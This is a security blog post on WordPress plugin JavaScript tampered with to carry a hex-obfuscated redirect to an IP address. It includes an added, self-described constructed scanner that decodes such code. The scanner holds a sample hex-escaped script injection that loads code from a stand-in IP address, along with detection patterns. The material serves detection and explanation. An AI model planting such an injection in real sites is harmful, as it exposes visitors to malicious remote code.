CMS Plugins: a real source of infections

When looking at malicious websites, most of us think of obfuscated JavaScript within HTML pages that, most of the time, redirects to some external exploit page.

One other location (a little less obvious) is within existing plugins used by popular CMS software such as WordPress.

Here is a particular one: wp-content/plugins/mailchimp/js/scrollTo.js?ver=1.2.6

A picture is worth a thousand words, so let’s explain what this means. The green rectangle marks the original code; the red box marks the code that was added to it. Essentially, the plugin will still work fine, but a new piece of functionality has been added!

This obfuscated (hexadecimal) code actually writes something nasty:

It is a redirection to an IP address with a parameter attached to it.
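The check below is an added example, not code from the original post: it looks for long runs of `\xNN` escapes in a plugin script, decodes them, and reports whether the decoded text is markup pointing at a raw IP address. The sample source, the function names and the address 192.0.2.10 (a documentation range) are constructed for illustration.

```javascript
// Constructed sample: one line of legitimate plugin code followed by an
// appended hex-escaped document.write(), mirroring the tampering described above.
const SAMPLE = String.raw`jQuery.fn.scrollTo = function (target) { return this; };
document.write("\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x30\x2e\x32\x2e\x31\x30\x2f\x3f\x61\x3d\x31\x3e");`;

// Eight or more consecutive \xNN escapes: rare in hand-written plugin code.
const HEX_RUN = /(?:\\x[0-9a-fA-F]{2}){8,}/g;
// URL whose host is a dotted-quad IP address rather than a domain name.
const IP_URL = /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?[^\s"'<>]*/i;
// Decoded text that opens a script or iframe element.
const INJECTS_MARKUP = /<\s*(?:script|iframe)\b/i;

// Turn a run of \xNN escapes back into the characters it hides.
function decodeHexRun(run) {
  return run.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) =>
    String.fromCharCode(parseInt(h, 16)));
}

// Return one finding per hex run: where it is, what it decodes to, and
// whether the decoded text references a raw-IP URL or injects markup.
function scanSource(name, source) {
  const findings = [];
  for (const m of source.matchAll(HEX_RUN)) {
    const decoded = decodeHexRun(m[0]);
    const url = decoded.match(IP_URL);
    findings.push({
      file: name,
      line: source.slice(0, m.index).split("\n").length,
      decoded,
      ipUrl: url ? url[0] : null,
      injectsMarkup: INJECTS_MARKUP.test(decoded),
    });
  }
  return findings;
}

for (const f of scanSource("scrollTo.js", SAMPLE)) {
  console.log(`${f.file}:${f.line} decoded=${JSON.stringify(f.decoded)} ` +
              `ipUrl=${f.ipUrl} injectsMarkup=${f.injectsMarkup}`);
}
```

Run against each `.js` file under `wp-content/plugins`, a finding on a file that should match the vendor's release is a reason to compare it against a clean copy of that plugin version.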

Case in point: plugins can be tampered with just as easily as a binary or HTML source code can be.

Interestingly, this plugin is up-to-date, so the old adage “keep your software patched up” is somewhat irrelevant here.

There are many ways this sort of thing can happen. The easiest and most often forgotten one is through stolen (or easy-to-guess) FTP passwords. And of course, classic software vulnerabilities are also a prime target for hackers looking to inject malicious content.

Jerome Segura
